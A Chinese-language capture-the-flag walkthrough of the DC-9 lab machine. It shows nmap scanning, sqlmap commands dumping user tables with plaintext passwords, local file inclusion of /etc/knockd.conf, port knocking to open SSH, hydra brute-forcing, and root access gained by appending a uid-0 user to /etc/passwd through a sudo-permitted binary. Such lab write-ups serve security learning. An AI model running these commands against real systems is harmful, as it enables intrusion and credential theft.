一、主机发现
使用netdiscover
发现主机为192.168.203.135
二、端口扫描
使用Nmap
:
root@kali:~# nmap -sV -A 192.168.203.135 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 15:16 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.135
Host is up (0.00046s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.135
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.203.135:80/manage.php
| Form id:
| Form action: manage.php
|
| Path: http://192.168.203.135:80/search.php
| Form id:
|_ Form action: results.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_ /includes/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.4.38:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-10097 6.0 https://vulners.com/cve/CVE-2019-10097
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-0215 6.0 https://vulners.com/cve/CVE-2019-0215
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
|_ CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
MAC Address: 00:0C:29:23:B6:C5 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.46 ms 192.168.203.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.38 seconds
目标开放了80端口,22端口显示被过滤掉了,查看web服务:
三、漏洞挖掘
在搜索框中尝试寻找sql注入。
可以看出确实存在注入。(网站应该对注入做了一定的过滤,而且还屏蔽了报错)
利用Sqlmap
进行注入:
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" --dbs
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff --tables
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T StaffDetails --columns
看起来好像只是员工的详细信息,查看另一个表:
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T Users --columns
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D Staff -T Users -C UserID,Username,Password --dump
得到admin密码为transorbital1
.
四、获取shell
我们拿去登录网站。
这里有一个很有意思的地方,File dose not exist
。
感觉像是存在本地文件包含:
果然存在本地文件包含。
本来打算还是将一句话写入apache的日志文件进行获取shell,但是靶机的作者,似乎将日志文件给换位置了。
于是借鉴了大佬的思路:https://blog.csdn.net/adminuil/article/details/104055711
/etc/knockd.conf
:
knockd是一种端口试探服务器工具。它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中。
可以看到目标果然做了手脚,这也是为什么我们探测的22端口显示是被过虑了。
现在我们需要依次访问7469、8475、9842三个端口,ssh端口就会开放.
现在我们即可看到22端口被打开了。
现在只有admin的账户,但是从刚才文件包含出来的/etc/passwd
中来看貌似没有admin的账户,所以思路不是admin,感觉更像是那些用户,于是我又重新将数据库注入了一次:
sqlmap -u "http://192.168.203.135/results.php" --data="search=123" -D users -T UserDetails --dump
得到:
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
接下来利用得到的账号和密码进行爆破,使用工具hydra
。
root@kali:~# hydra -L username.txt -P password.txt 192.168.203.135 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-17 17:18:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 306 login tries (l:17/p:18), ~20 tries per task
[DATA] attacking ssh://192.168.203.135:22/
[22][ssh] host: 192.168.203.135 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.203.135 login: janitor password: Ilovepeepee
[22][ssh] host: 192.168.203.135 login: joeyt password: Passw0rd
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-17 17:19:52
我们得到了三对账号密码。依次登录切换密码,最终在用户janitor
的目录下找到了隐藏文件
像是其他用户的密码,我们将这些密码再进行一次爆破。
[22][ssh] host: 192.168.203.135 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.203.135 login: joeyt password: Passw0rd
五、提权
登录用户fredf
发现可以无需root密码执行/opt/devstuff/dist/test/test
。
test
为可执行文件,我们翻一下目录,看看是否能找到什么其他的线索。
发现了他的源码,看了看用法,大体上可以理解为:
读取第一个参数的内容,然后将参数一的内容写入到参数二的内容中。
于是,我们可以创建一个用户密码,写入到/etc/passwd
perl -le 'print crypt("hackergu","salt")'
,生成加盐的密码。
创建一个用户:
echo 'admin:saBGghOLaw5vg:0:0::/root:/bin/bash' >> /tmp/passwd
写入/etc/passwd
:
fredf@dc-9:/opt/devstuff/dist/test$ echo 'admin:saBGghOLaw5vg:0:0::/root:/bin/bash' >> /tmp/passwd
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password:
root@dc-9:/opt/devstuff/dist/test# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.